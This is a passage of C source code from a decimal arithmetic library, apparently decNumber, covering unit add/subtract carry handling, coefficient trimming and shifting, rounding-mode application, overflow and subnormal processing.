*c-=DECDPUNMAX+1; #elif DECDPUN<=2 /* Can use QUOT10 as carry <= 4 digits */ if (carry>=0) { est=QUOT10(carry, DECDPUN); *c=(Unit)(carry-est*(DECDPUNMAX+1)); /* remainder */ carry=est; /* quotient */ continue; } /* negative case */ carry=carry+(eInt)(DECDPUNMAX+1)*(DECDPUNMAX+1); /* make positive */ est=QUOT10(carry, DECDPUN); *c=(Unit)(carry-est*(DECDPUNMAX+1)); carry=est-(DECDPUNMAX+1); /* correctly negative */ #else /* remainder operator is undefined if negative, so must test */ if ((ueInt)carry<(DECDPUNMAX+1)*2) { /* fastpath carry +1 */ *c=(Unit)(carry-(DECDPUNMAX+1)); /* [helps additions] */ carry=1; continue; } if (carry>=0) { *c=(Unit)(carry%(DECDPUNMAX+1)); carry=carry/(DECDPUNMAX+1); continue; } /* negative case */ carry=carry+(eInt)(DECDPUNMAX+1)*(DECDPUNMAX+1); /* make positive */ *c=(Unit)(carry%(DECDPUNMAX+1)); carry=carry/(DECDPUNMAX+1)-(DECDPUNMAX+1); #endif } /* c */ /* now may have one or other to complete */ /* [pretest to avoid loop setup/shutdown] */ if (c<maxC) for (; c<maxC; c++) { if (a<alsu+alength) { /* still in A */ carry+=*a; a++; } else { /* inside B */ carry+=((eInt)*b)*m; b++; } /* here carry is new Unit of digits; it could be +ve or -ve and */ /* magnitude up to DECDPUNMAX squared */ if ((ueInt)carry<=DECDPUNMAX) { /* fastpath 0-DECDPUNMAX */ *c=(Unit)carry; carry=0; continue; } /* result for this unit is negative or >DECDPUNMAX */ #if DECDPUN==4 /* use divide-by-multiply */ if (carry>=0) { est=(((ueInt)carry>>11)*53687)>>18; *c=(Unit)(carry-est*(DECDPUNMAX+1)); /* remainder */ carry=est; /* likely quotient [79.7%] */ if (*c<DECDPUNMAX+1) continue; /* estimate was correct */ carry++; *c-=DECDPUNMAX+1; continue; } /* negative case */ carry=carry+(eInt)(DECDPUNMAX+1)*(DECDPUNMAX+1); /* make positive */ est=(((ueInt)carry>>11)*53687)>>18; *c=(Unit)(carry-est*(DECDPUNMAX+1)); carry=est-(DECDPUNMAX+1); /* correctly negative */ if (*c<DECDPUNMAX+1) continue; /* was OK */ carry++; *c-=DECDPUNMAX+1; #elif DECDPUN==3 if (carry>=0) { est=(((ueInt)carry>>3)*16777)>>21; *c=(Unit)(carry-est*(DECDPUNMAX+1)); /* remainder */ carry=est; /* likely quotient [99%] */ if (*c<DECDPUNMAX+1) continue; /* estimate was correct */ carry++; *c-=DECDPUNMAX+1; continue; } /* negative case */ carry=carry+(eInt)(DECDPUNMAX+1)*(DECDPUNMAX+1); /* make positive */ est=(((ueInt)carry>>3)*16777)>>21; *c=(Unit)(carry-est*(DECDPUNMAX+1)); carry=est-(DECDPUNMAX+1); /* correctly negative */ if (*c<DECDPUNMAX+1) continue; /* was OK */ carry++; *c-=DECDPUNMAX+1; #elif DECDPUN<=2 if (carry>=0) { est=QUOT10(carry, DECDPUN); *c=(Unit)(carry-est*(DECDPUNMAX+1)); /* remainder */ carry=est; /* quotient */ continue; } /* negative case */ carry=carry+(eInt)(DECDPUNMAX+1)*(DECDPUNMAX+1); /* make positive */ est=QUOT10(carry, DECDPUN); *c=(Unit)(carry-est*(DECDPUNMAX+1)); carry=est-(DECDPUNMAX+1); /* correctly negative */ #else if ((ueInt)carry<(DECDPUNMAX+1)*2){ /* fastpath carry 1 */ *c=(Unit)(carry-(DECDPUNMAX+1)); carry=1; continue; } /* remainder operator is undefined if negative, so must test */ if (carry>=0) { *c=(Unit)(carry%(DECDPUNMAX+1)); carry=carry/(DECDPUNMAX+1); continue; } /* negative case */ carry=carry+(eInt)(DECDPUNMAX+1)*(DECDPUNMAX+1); /* make positive */ *c=(Unit)(carry%(DECDPUNMAX+1)); carry=carry/(DECDPUNMAX+1)-(DECDPUNMAX+1); #endif } /* c */ /* OK, all A and B processed; might still have carry or borrow */ /* return number of Units in the result, negated if a borrow */ if (carry==0) return c-clsu; /* no carry, so no more to do */ if (carry>0) { /* positive carry */ *c=(Unit)carry; /* place as new unit */ c++; /* .. */ return c-clsu; } /* -ve carry: it's a borrow; complement needed */ add=1; /* temporary carry... */ for (c=clsu; c<maxC; c++) { add=DECDPUNMAX+add-*c; if (add<=DECDPUNMAX) { *c=(Unit)add; add=0; } else { *c=0; add=1; } } /* add an extra unit iff it would be non-zero */ #if DECTRACE printf("UAS borrow: add %ld, carry %ld\n", add, carry); #endif if ((add-carry-1)!=0) { *c=(Unit)(add-carry-1); c++; /* interesting, include it */ } return clsu-c; /* -ve result indicates borrowed */ } /* decUnitAddSub */ /* ------------------------------------------------------------------ */ /* decTrim -- trim trailing zeros or normalize */ /* */ /* dn is the number to trim or normalize */ /* set is the context to use to check for clamp */ /* all is 1 to remove all trailing zeros, 0 for just fraction ones */ /* dropped returns the number of discarded trailing zeros */ /* returns dn */ /* */ /* If clamp is set in the context then the number of zeros trimmed */ /* may be limited if the exponent is high. */ /* All fields are updated as required. This is a utility operation, */ /* so special values are unchanged and no error is possible. */ /* ------------------------------------------------------------------ */ static decNumber * decTrim(decNumber *dn, decContext *set, Flag all, Int *dropped) { Int d, exp; /* work */ uInt cut; /* .. */ Unit *up; /* -> current Unit */ #if DECCHECK if (decCheckOperands(dn, DECUNUSED, DECUNUSED, DECUNCONT)) return dn; #endif *dropped=0; /* assume no zeros dropped */ if ((dn->bits & DECSPECIAL) /* fast exit if special .. */ || (*dn->lsu & 0x01)) return dn; /* .. or odd */ if (ISZERO(dn)) { /* .. or 0 */ dn->exponent=0; /* (sign is preserved) */ return dn; } /* have a finite number which is even */ exp=dn->exponent; cut=1; /* digit (1-DECDPUN) in Unit */ up=dn->lsu; /* -> current Unit */ for (d=0; d<dn->digits-1; d++) { /* [don't strip the final digit] */ /* slice by powers */ #if DECDPUN<=4 uInt quot=QUOT10(*up, cut); if ((*up-quot*powers[cut])!=0) break; /* found non-0 digit */ #else if (*up%powers[cut]!=0) break; /* found non-0 digit */ #endif /* have a trailing 0 */ if (!all) { /* trimming */ /* [if exp>0 then all trailing 0s are significant for trim] */ if (exp<=0) { /* if digit might be significant */ if (exp==0) break; /* then quit */ exp++; /* next digit might be significant */ } } cut++; /* next power */ if (cut>DECDPUN) { /* need new Unit */ up++; cut=1; } } /* d */ if (d==0) return dn; /* none to drop */ /* may need to limit drop if clamping */ if (set->clamp) { Int maxd=set->emax-set->digits+1-dn->exponent; if (maxd<=0) return dn; /* nothing possible */ if (d>maxd) d=maxd; } /* effect the drop */ decShiftToLeast(dn->lsu, D2U(dn->digits), d); dn->exponent+=d; /* maintain numerical value */ dn->digits-=d; /* new length */ *dropped=d; /* report the count */ return dn; } /* decTrim */ /* ------------------------------------------------------------------ */ /* decReverse -- reverse a Unit array in place */ /* */ /* ulo is the start of the array */ /* uhi is the end of the array (highest Unit to include) */ /* */ /* The units ulo through uhi are reversed in place (if the number */ /* of units is odd, the middle one is untouched). Note that the */ /* digit(s) in each unit are unaffected. */ /* ------------------------------------------------------------------ */ static void decReverse(Unit *ulo, Unit *uhi) { Unit temp; for (; ulo<uhi; ulo++, uhi--) { temp=*ulo; *ulo=*uhi; *uhi=temp; } return; } /* decReverse */ /* ------------------------------------------------------------------ */ /* decShiftToMost -- shift digits in array towards most significant */ /* */ /* uar is the array */ /* digits is the count of digits in use in the array */ /* shift is the number of zeros to pad with (least significant); */ /* it must be zero or positive */ /* */ /* returns the new length of the integer in the array, in digits */ /* */ /* No overflow is permitted (that is, the uar array must be known to */ /* be large enough to hold the result, after shifting). */ /* ------------------------------------------------------------------ */ static Int decShiftToMost(Unit *uar, Int digits, Int shift) { Unit *target, *source, *first; /* work */ Int cut; /* odd 0's to add */ uInt next; /* work */ if (shift==0) return digits; /* [fastpath] nothing to do */ if ((digits+shift)<=DECDPUN) { /* [fastpath] single-unit case */ *uar=(Unit)(*uar*powers[shift]); return digits+shift; } next=0; /* all paths */ source=uar+D2U(digits)-1; /* where msu comes from */ target=source+D2U(shift); /* where upper part of first cut goes */ cut=DECDPUN-MSUDIGITS(shift); /* where to slice */ if (cut==0) { /* unit-boundary case */ for (; source>=uar; source--, target--) *target=*source; } else { first=uar+D2U(digits+shift)-1; /* where msu of source will end up */ for (; source>=uar; source--, target--) { /* split the source Unit and accumulate remainder for next */ #if DECDPUN<=4 uInt quot=QUOT10(*source, cut); uInt rem=*source-quot*powers[cut]; next+=quot; #else uInt rem=*source%powers[cut]; next+=*source/powers[cut]; #endif if (target<=first) *target=(Unit)next; /* write to target iff valid */ next=rem*powers[DECDPUN-cut]; /* save remainder for next Unit */ } } /* shift-move */ /* propagate any partial unit to one below and clear the rest */ for (; target>=uar; target--) { *target=(Unit)next; next=0; } return digits+shift; } /* decShiftToMost */ /* ------------------------------------------------------------------ */ /* decShiftToLeast -- shift digits in array towards least significant */ /* */ /* uar is the array */ /* units is length of the array, in units */ /* shift is the number of digits to remove from the lsu end; it */ /* must be zero or positive and <= than units*DECDPUN. */ /* */ /* returns the new length of the integer in the array, in units */ /* */ /* Removed digits are discarded (lost). Units not required to hold */ /* the final result are unchanged. */ /* ------------------------------------------------------------------ */ static Int decShiftToLeast(Unit *uar, Int units, Int shift) { Unit *target, *up; /* work */ Int cut, count; /* work */ Int quot, rem; /* for division */ if (shift==0) return units; /* [fastpath] nothing to do */ if (shift==units*DECDPUN) { /* [fastpath] little to do */ *uar=0; /* all digits cleared gives zero */ return 1; /* leaves just the one */ } target=uar; /* both paths */ cut=MSUDIGITS(shift); if (cut==DECDPUN) { /* unit-boundary case; easy */ up=uar+D2U(shift); for (; up<uar+units; target++, up++) *target=*up; return target-uar; } /* messier */ up=uar+D2U(shift-cut); /* source; correct to whole Units */ count=units*DECDPUN-shift; /* the maximum new length */ #if DECDPUN<=4 quot=QUOT10(*up, cut); #else quot=*up/powers[cut]; #endif for (; ; target++) { *target=(Unit)quot; count-=(DECDPUN-cut); if (count<=0) break; up++; quot=*up; #if DECDPUN<=4 quot=QUOT10(quot, cut); rem=*up-quot*powers[cut]; #else rem=quot%powers[cut]; quot=quot/powers[cut]; #endif *target=(Unit)(*target+rem*powers[DECDPUN-cut]); count-=cut; if (count<=0) break; } return target-uar+1; } /* decShiftToLeast */ #if DECSUBSET /* ------------------------------------------------------------------ */ /* decRoundOperand -- round an operand [used for subset only] */ /* */ /* dn is the number to round (dn->digits is > set->digits) */ /* set is the relevant context */ /* status is the status accumulator */ /* */ /* returns an allocated decNumber with the rounded result. */ /* */ /* lostDigits and other status may be set by this. */ /* */ /* Since the input is an operand, it must not be modified. */ /* Instead, return an allocated decNumber, rounded as required. */ /* It is the caller's responsibility to free the allocated storage. */ /* */ /* If no storage is available then the result cannot be used, so NULL */ /* is returned. */ /* ------------------------------------------------------------------ */ static decNumber *decRoundOperand(const decNumber *dn, decContext *set, uInt *status) { decNumber *res; /* result structure */ uInt newstatus=0; /* status from round */ Int residue=0; /* rounding accumulator */ /* Allocate storage for the returned decNumber, big enough for the */ /* length specified by the context */ res=(decNumber *)malloc(sizeof(decNumber) +(D2U(set->digits)-1)*sizeof(Unit)); if (res==NULL) { *status|=DEC_Insufficient_storage; return NULL; } decCopyFit(res, dn, set, &residue, &newstatus); decApplyRound(res, set, residue, &newstatus); /* If that set Inexact then "lost digits" is raised... */ if (newstatus & DEC_Inexact) newstatus|=DEC_Lost_digits; *status|=newstatus; return res; } /* decRoundOperand */ #endif /* ------------------------------------------------------------------ */ /* decCopyFit -- copy a number, truncating the coefficient if needed */ /* */ /* dest is the target decNumber */ /* src is the source decNumber */ /* set is the context [used for length (digits) and rounding mode] */ /* residue is the residue accumulator */ /* status contains the current status to be updated */ /* */ /* (dest==src is allowed and will be a no-op if fits) */ /* All fields are updated as required. */ /* ------------------------------------------------------------------ */ static void decCopyFit(decNumber *dest, const decNumber *src, decContext *set, Int *residue, uInt *status) { dest->bits=src->bits; dest->exponent=src->exponent; decSetCoeff(dest, set, src->lsu, src->digits, residue, status); } /* decCopyFit */ /* ------------------------------------------------------------------ */ /* decSetCoeff -- set the coefficient of a number */ /* */ /* dn is the number whose coefficient array is to be set. */ /* It must have space for set->digits digits */ /* set is the context [for size] */ /* lsu -> lsu of the source coefficient [may be dn->lsu] */ /* len is digits in the source coefficient [may be dn->digits] */ /* residue is the residue accumulator. This has values as in */ /* decApplyRound, and will be unchanged unless the */ /* target size is less than len. In this case, the */ /* coefficient is truncated and the residue is updated to */ /* reflect the previous residue and the dropped digits. */ /* status is the status accumulator, as usual */ /* */ /* The coefficient may already be in the number, or it can be an */ /* external intermediate array. If it is in the number, lsu must == */ /* dn->lsu and len must == dn->digits. */ /* */ /* Note that the coefficient length (len) may be < set->digits, and */ /* in this case this merely copies the coefficient (or is a no-op */ /* if dn->lsu==lsu). */ /* */ /* Note also that (only internally, from decQuantizeOp and */ /* decSetSubnormal) the value of set->digits may be less than one, */ /* indicating a round to left. This routine handles that case */ /* correctly; caller ensures space. */ /* */ /* dn->digits, dn->lsu (and as required), and dn->exponent are */ /* updated as necessary. dn->bits (sign) is unchanged. */ /* */ /* DEC_Rounded status is set if any digits are discarded. */ /* DEC_Inexact status is set if any non-zero digits are discarded, or */ /* incoming residue was non-0 (implies rounded) */ /* ------------------------------------------------------------------ */ /* mapping array: maps 0-9 to canonical residues, so that a residue */ /* can be adjusted in the range [-1, +1] and achieve correct rounding */ /* 0 1 2 3 4 5 6 7 8 9 */ static const uByte resmap[10]={0, 3, 3, 3, 3, 5, 7, 7, 7, 7}; static void decSetCoeff(decNumber *dn, decContext *set, const Unit *lsu, Int len, Int *residue, uInt *status) { Int discard; /* number of digits to discard */ uInt cut; /* cut point in Unit */ const Unit *up; /* work */ Unit *target; /* .. */ Int count; /* .. */ #if DECDPUN<=4 uInt temp; /* .. */ #endif discard=len-set->digits; /* digits to discard */ if (discard<=0) { /* no digits are being discarded */ if (dn->lsu!=lsu) { /* copy needed */ /* copy the coefficient array to the result number; no shift needed */ count=len; /* avoids D2U */ up=lsu; for (target=dn->lsu; count>0; target++, up++, count-=DECDPUN) *target=*up; dn->digits=len; /* set the new length */ } /* dn->exponent and residue are unchanged, record any inexactitude */ if (*residue!=0) *status|=(DEC_Inexact | DEC_Rounded); return; } /* some digits must be discarded ... */ dn->exponent+=discard; /* maintain numerical value */ *status|=DEC_Rounded; /* accumulate Rounded status */ if (*residue>1) *residue=1; /* previous residue now to right, so reduce */ if (discard>len) { /* everything, +1, is being discarded */ /* guard digit is 0 */ /* residue is all the number [NB could be all 0s] */ if (*residue<=0) { /* not already positive */ count=len; /* avoids D2U */ for (up=lsu; count>0; up++, count-=DECDPUN) if (*up!=0) { /* found non-0 */ *residue=1; break; /* no need to check any others */ } } if (*residue!=0) *status|=DEC_Inexact; /* record inexactitude */ *dn->lsu=0; /* coefficient will now be 0 */ dn->digits=1; /* .. */ return; } /* total discard */ /* partial discard [most common case] */ /* here, at least the first (most significant) discarded digit exists */ /* spin up the number, noting residue during the spin, until get to */ /* the Unit with the first discarded digit. When reach it, extract */ /* it and remember its position */ count=0; for (up=lsu;; up++) { count+=DECDPUN; if (count>=discard) break; /* full ones all checked */ if (*up!=0) *residue=1; } /* up */ /* here up -> Unit with first discarded digit */ cut=discard-(count-DECDPUN)-1; if (cut==DECDPUN-1) { /* unit-boundary case (fast) */ Unit half=(Unit)powers[DECDPUN]>>1; /* set residue directly */ if (*up>=half) { if (*up>half) *residue=7; else *residue+=5; /* add sticky bit */ } else { /* <half */ if (*up!=0) *residue=3; /* [else is 0, leave as sticky bit] */ } if (set->digits<=0) { /* special for Quantize/Subnormal :-( */ *dn->lsu=0; /* .. result is 0 */ dn->digits=1; /* .. */ } else { /* shift to least */ count=set->digits; /* now digits to end up with */ dn->digits=count; /* set the new length */ up++; /* move to next */ /* on unit boundary, so shift-down copy loop is simple */ for (target=dn->lsu; count>0; target++, up++, count-=DECDPUN) *target=*up; } } /* unit-boundary case */ else { /* discard digit is in low digit(s), and not top digit */ uInt discard1; /* first discarded digit */ uInt quot, rem; /* for divisions */ if (cut==0) quot=*up; /* is at bottom of unit */ else /* cut>0 */ { /* it's not at bottom of unit */ #if DECDPUN<=4 quot=QUOT10(*up, cut); rem=*up-quot*powers[cut]; #else rem=*up%powers[cut]; quot=*up/powers[cut]; #endif if (rem!=0) *residue=1; } /* discard digit is now at bottom of quot */ #if DECDPUN<=4 temp=(quot*6554)>>16; /* fast /10 */ /* Vowels algorithm here not a win (9 instructions) */ discard1=quot-X10(temp); quot=temp; #else discard1=quot%10; quot=quot/10; #endif /* here, discard1 is the guard digit, and residue is everything */ /* else [use mapping array to accumulate residue safely] */ *residue+=resmap[discard1]; cut++; /* update cut */ /* here: up -> Unit of the array with bottom digit */ /* cut is the division point for each Unit */ /* quot holds the uncut high-order digits for the current unit */ if (set->digits<=0) { /* special for Quantize/Subnormal :-( */ *dn->lsu=0; /* .. result is 0 */ dn->digits=1; /* .. */ } else { /* shift to least needed */ count=set->digits; /* now digits to end up with */ dn->digits=count; /* set the new length */ /* shift-copy the coefficient array to the result number */ for (target=dn->lsu; ; target++) { *target=(Unit)quot; count-=(DECDPUN-cut); if (count<=0) break; up++; quot=*up; #if DECDPUN<=4 quot=QUOT10(quot, cut); rem=*up-quot*powers[cut]; #else rem=quot%powers[cut]; quot=quot/powers[cut]; #endif *target=(Unit)(*target+rem*powers[DECDPUN-cut]); count-=cut; if (count<=0) break; } /* shift-copy loop */ } /* shift to least */ } /* not unit boundary */ if (*residue!=0) *status|=DEC_Inexact; /* record inexactitude */ return; } /* decSetCoeff */ /* ------------------------------------------------------------------ */ /* decApplyRound -- apply pending rounding to a number */ /* */ /* dn is the number, with space for set->digits digits */ /* set is the context [for size and rounding mode] */ /* residue indicates pending rounding, being any accumulated */ /* guard and sticky information. It may be: */ /* 6-9: rounding digit is >5 */ /* 5: rounding digit is exactly half-way */ /* 1-4: rounding digit is <5 and >0 */ /* 0: the coefficient is exact */ /* -1: as 1, but the hidden digits are subtractive, that */ /* is, of the opposite sign to dn. In this case the */ /* coefficient must be non-0. This case occurs when */ /* subtracting a small number (which can be reduced to */ /* a sticky bit); see decAddOp. */ /* status is the status accumulator, as usual */ /* */ /* This routine applies rounding while keeping the length of the */ /* coefficient constant. The exponent and status are unchanged */ /* except if: */ /* */ /* -- the coefficient was increased and is all nines (in which */ /* case Overflow could occur, and is handled directly here so */ /* the caller does not need to re-test for overflow) */ /* */ /* -- the coefficient was decreased and becomes all nines (in which */ /* case Underflow could occur, and is also handled directly). */ /* */ /* All fields in dn are updated as required. */ /* */ /* ------------------------------------------------------------------ */ static void decApplyRound(decNumber *dn, decContext *set, Int residue, uInt *status) { Int bump; /* 1 if coefficient needs to be incremented */ /* -1 if coefficient needs to be decremented */ if (residue==0) return; /* nothing to apply */ bump=0; /* assume a smooth ride */ /* now decide whether, and how, to round, depending on mode */ switch (set->round) { case DEC_ROUND_05UP: { /* round zero or five up (for reround) */ /* This is the same as DEC_ROUND_DOWN unless there is a */ /* positive residue and the lsd of dn is 0 or 5, in which case */ /* it is bumped; when residue is <0, the number is therefore */ /* bumped down unless the final digit was 1 or 6 (in which */ /* case it is bumped down and then up -- a no-op) */ Int lsd5=*dn->lsu%5; /* get lsd and quintate */ if (residue<0 && lsd5!=1) bump=-1; else if (residue>0 && lsd5==0) bump=1; /* [bump==1 could be applied directly; use common path for clarity] */ break;} /* r-05 */ case DEC_ROUND_DOWN: { /* no change, except if negative residue */ if (residue<0) bump=-1; break;} /* r-d */ case DEC_ROUND_HALF_DOWN: { if (residue>5) bump=1; break;} /* r-h-d */ case DEC_ROUND_HALF_EVEN: { if (residue>5) bump=1; /* >0.5 goes up */ else if (residue==5) { /* exactly 0.5000... */ /* 0.5 goes up iff [new] lsd is odd */ if (*dn->lsu & 0x01) bump=1; } break;} /* r-h-e */ case DEC_ROUND_HALF_UP: { if (residue>=5) bump=1; break;} /* r-h-u */ case DEC_ROUND_UP: { if (residue>0) bump=1; break;} /* r-u */ case DEC_ROUND_CEILING: { /* same as _UP for positive numbers, and as _DOWN for negatives */ /* [negative residue cannot occur on 0] */ if (decNumberIsNegative(dn)) { if (residue<0) bump=-1; } else { if (residue>0) bump=1; } break;} /* r-c */ case DEC_ROUND_FLOOR: { /* same as _UP for negative numbers, and as _DOWN for positive */ /* [negative residue cannot occur on 0] */ if (!decNumberIsNegative(dn)) { if (residue<0) bump=-1; } else { if (residue>0) bump=1; } break;} /* r-f */ default: { /* e.g., DEC_ROUND_MAX */ *status|=DEC_Invalid_context; #if DECTRACE || (DECCHECK && DECVERB) printf("Unknown rounding mode: %d\n", set->round); #endif break;} } /* switch */ /* now bump the number, up or down, if need be */ if (bump==0) return; /* no action required */ /* Simply use decUnitAddSub unless bumping up and the number is */ /* all nines. In this special case set to 100... explicitly */ /* and adjust the exponent by one (as otherwise could overflow */ /* the array) */ /* Similarly handle all-nines result if bumping down. */ if (bump>0) { Unit *up; /* work */ uInt count=dn->digits; /* digits to be checked */ for (up=dn->lsu; ; up++) { if (count<=DECDPUN) { /* this is the last Unit (the msu) */ if (*up!=powers[count]-1) break; /* not still 9s */ /* here if it, too, is all nines */ *up=(Unit)powers[count-1]; /* here 999 -> 100 etc. */ for (up=up-1; up>=dn->lsu; up--) *up=0; /* others all to 0 */ dn->exponent++; /* and bump exponent */ /* [which, very rarely, could cause Overflow...] */ if ((dn->exponent+dn->digits)>set->emax+1) { decSetOverflow(dn, set, status); } return; /* done */ } /* a full unit to check, with more to come */ if (*up!=DECDPUNMAX) break; /* not still 9s */ count-=DECDPUN; } /* up */ } /* bump>0 */ else { /* -1 */ /* here checking for a pre-bump of 1000... (leading 1, all */ /* other digits zero) */ Unit *up, *sup; /* work */ uInt count=dn->digits; /* digits to be checked */ for (up=dn->lsu; ; up++) { if (count<=DECDPUN) { /* this is the last Unit (the msu) */ if (*up!=powers[count-1]) break; /* not 100.. */ /* here if have the 1000... case */ sup=up; /* save msu pointer */ *up=(Unit)powers[count]-1; /* here 100 in msu -> 999 */ /* others all to all-nines, too */ for (up=up-1; up>=dn->lsu; up--) *up=(Unit)powers[DECDPUN]-1; dn->exponent--; /* and bump exponent */ /* iff the number was at the subnormal boundary (exponent=etiny) */ /* then the exponent is now out of range, so it will in fact get */ /* clamped to etiny and the final 9 dropped. */ /* printf(">> emin=%d exp=%d sdig=%d\n", set->emin, */ /* dn->exponent, set->digits); */ if (dn->exponent+1==set->emin-set->digits+1) { if (count==1 && dn->digits==1) *sup=0; /* here 9 -> 0[.9] */ else { *sup=(Unit)powers[count-1]-1; /* here 999.. in msu -> 99.. */ dn->digits--; } dn->exponent++; *status|=DEC_Underflow | DEC_Subnormal | DEC_Inexact | DEC_Rounded; } return; /* done */ } /* a full unit to check, with more to come */ if (*up!=0) break; /* not still 0s */ count-=DECDPUN; } /* up */ } /* bump<0 */ /* Actual bump needed. Do it. */ decUnitAddSub(dn->lsu, D2U(dn->digits), uarrone, 1, 0, dn->lsu, bump); } /* decApplyRound */ #if DECSUBSET /* ------------------------------------------------------------------ */ /* decFinish -- finish processing a number */ /* */ /* dn is the number */ /* set is the context */ /* residue is the rounding accumulator (as in decApplyRound) */ /* status is the accumulator */ /* */ /* This finishes off the current number by: */ /* 1. If not extended: */ /* a. Converting a zero result to clean '0' */ /* b. Reducing positive exponents to 0, if would fit in digits */ /* 2. Checking for overflow and subnormals (always) */ /* Note this is just Finalize when no subset arithmetic. */ /* All fields are updated as required. */ /* ------------------------------------------------------------------ */ static void decFinish(decNumber *dn, decContext *set, Int *residue, uInt *status) { if (!set->extended) { if ISZERO(dn) { /* value is zero */ dn->exponent=0; /* clean exponent .. */ dn->bits=0; /* .. and sign */ return; /* no error possible */ } if (dn->exponent>=0) { /* non-negative exponent */ /* >0; reduce to integer if possible */ if (set->digits >= (dn->exponent+dn->digits)) { dn->digits=decShiftToMost(dn->lsu, dn->digits, dn->exponent); dn->exponent=0; } } } /* !extended */ decFinalize(dn, set, residue, status); } /* decFinish */ #endif /* ------------------------------------------------------------------ */ /* decFinalize -- final check, clamp, and round of a number */ /* */ /* dn is the number */ /* set is the context */ /* residue is the rounding accumulator (as in decApplyRound) */ /* status is the status accumulator */ /* */ /* This finishes off the current number by checking for subnormal */ /* results, applying any pending rounding, checking for overflow, */ /* and applying any clamping. */ /* Underflow and overflow conditions are raised as appropriate. */ /* All fields are updated as required. */ /* ------------------------------------------------------------------ */ static void decFinalize(decNumber *dn, decContext *set, Int *residue, uInt *status) { Int shift; /* shift needed if clamping */ Int tinyexp=set->emin-dn->digits+1; /* precalculate subnormal boundary */ /* Must be careful, here, when checking the exponent as the */ /* adjusted exponent could overflow 31 bits [because it may already */ /* be up to twice the expected]. */ /* First test for subnormal. This must be done before any final */ /* round as the result could be rounded to Nmin or 0. */ if (dn->exponent<=tinyexp) { /* prefilter */ Int comp; decNumber nmin; /* A very nasty case here is dn == Nmin and residue<0 */ if (dn->exponent<tinyexp) { /* Go handle subnormals; this will apply round if needed. */ decSetSubnormal(dn, set, residue, status); return; } /* Equals case: only subnormal if dn=Nmin and negative residue */ decNumberZero(&nmin); nmin.lsu[0]=1; nmin.exponent=set->emin; comp=decCompare(dn, &nmin, 1); /* (signless compare) */ if (comp==BADINT) { /* oops */ *status|=DEC_Insufficient_storage; /* abandon... */ return; } if (*residue<0 && comp==0) { /* neg residue and dn==Nmin */ decApplyRound(dn, set, *residue, status); /* might force down */ decSetSubnormal(dn, set, residue, status); return; } } /* now apply any pending round (this could raise overflow). */ if (*residue!=0) decApplyRound(dn, set, *residue, status); /* Check for overflow [redundant in the 'rare' case] or clamp */ if (dn->exponent<=set->emax-set->digits+1) return; /* neither needed */ /* here when might have an overflow or clamp to do */ if (dn->exponent>set->emax-dn->digits+1) { /* too big */ decSetOverflow(dn, set, status); return; } /* here when the result is normal but in clamp range */ if (!set->clamp) return; /* here when need to apply the IEEE exponent clamp (fold-down) */ shift=dn->exponent-(set->emax-set->digits+1); /* shift coefficient (if non-zero) */ if (!ISZERO(dn)) { dn->digits=decShiftToMost(dn->lsu, dn->digits, shift); } dn->exponent-=shift; /* adjust the exponent to match */ *status|=DEC_Clamped; /* and record the dirty deed */ return; } /* decFinalize */ /* ------------------------------------------------------------------ */ /* decSetOverflow -- set number to proper overflow value */ /* */ /* dn is the number (used for sign [only] and result) */ /* set is the context [used for the rounding mode, etc.] */ /* status contains the current status to be updated */ /* */ /* This sets the sign of a number and sets its value to either */ /* Infinity or the maximum finite value, depending on the sign of */ /* dn and the rounding mode, following IEEE 854 rules. */ /* ------------------------------------------------------------------ */ static void decSetOverflow(decNumber *dn, decContext *set, uInt *status) { Flag needmax=0; /* result is maximum finite value */ uByte sign=dn->bits&DECNEG; /* clean and save sign bit */ if (ISZERO(dn)) { /* zero does not overflow magnitude */ Int emax=set->emax; /* limit value */ if (set->clamp) emax-=set->digits-1; /* lower if clamping */ if (dn->exponent>emax) { /* clamp required */ dn->exponent=emax; *status|=DEC_Clamped; } return; } decNumberZero(dn); switch (set->round) { case DEC_ROUND_DOWN: { needmax=1; /* never Infinity */ break;} /* r-d */ case DEC_ROUND_05UP: { needmax=1; /* never Infinity */ break;} /* r-05 */ case DEC_ROUND_CEILING: { if (sign) needmax=1; /* Infinity if non-negative */ break;} /* r-c */ case DEC_ROUND_FLOOR: { if (!sign) needmax=1; /* Infinity if negative */ break;} /* r-f */ default: break; /* Infinity in all other cases */ } if (needmax) { decSetMaxValue(dn, set); dn->bits=sign; /* set sign */ } else dn->bits=sign|DECINF; /* Value is +/-Infinity */ *status|=DEC_Overflow | DEC_Inexact | DEC_Rounded; } /* decSetOverflow */ /* ------------------------------------------------------------------ */ /* decSetMaxValue -- set number to +Nmax (maximum normal value) */ /* */ /* dn is the number to set */ /* set is the context [used for digits and emax] */ /* */ /* This sets the number to the maximum positive value. */ /* ------------------------------------------------------------------ */ static void decSetMaxValue(decNumber *dn, decContext *set) { Unit *up; /* work */ Int count=set->digits; /* nines to add */ dn->digits=count; /* fill in all nines to set maximum value */ for (up=dn->lsu; ; up++) { if (count>DECDPUN) *up=DECDPUNMAX; /* unit full o'nines */ else { /* this is the msu */ *up=(Unit)(powers[count]-1); break; } count-=DECDPUN; /* filled those digits */ } /* up */ dn->bits=0; /* + sign */ dn->exponent=set->emax-set->digits+1; } /* decSetMaxValue */ /* ------------------------------------------------------------------ */ /* decSetSubnormal -- process value whose exponent is <Emin */ /* */ /* dn is the number (used as input as well as output; it may have */ /* an allowed subnormal value, which may need to be rounded) */ /* set is the context [used for the rounding mode] */ /* residue is any pending residue */ /* status contains the current status to be updated */ /* */ /* If subset mode, set result to zero and set Underflow flags. */ /* */ /* Value may be zero with a low exponent; this does not set Subnormal */ /* but the exponent will be clamped to Etiny. */ /* */ /* Otherwise ensure exponent is not out of range, and round as */ /* necessary. Underflow is set if the result is Inexact. */ /* ------------------------------------------------------------------ */ static void decSetSubnormal(decNumber *dn, decContext *set, Int *residue, uInt *status) { decContext workset; /* work */ Int etiny, adjust; /* .. */ #if DECSUBSET /* simple set to zero and 'hard underflow' for subset */ if (!set->extended) { decNumberZero(dn); /* always full overflow */ *status|=DEC_Underflow | DEC_Subnormal | DEC_Inexact | DEC_Rounded; return; } #endif /* Full arithmetic -- allow subnormals, rounded to minimum exponent */ /* (Etiny) if needed */ etiny=set->emin-(set->digits-1); /* smallest allowed exponent */ if ISZERO(dn) { /* value is zero */ /* residue can never be non-zero here */ #if DECCHECK if (*residue!=0) { printf("++ Subnormal 0 residue %ld\n", (LI)*residue); *status|=DEC_Invalid_operation; } #endif if (dn->exponent<etiny) { /* clamp required */ dn->exponent=etiny; *status|=DEC_Clamped; } return; } *status|=DEC_Subnormal; /* have a non-zero subnormal */ adjust=etiny-dn->exponent; /* calculate digits to 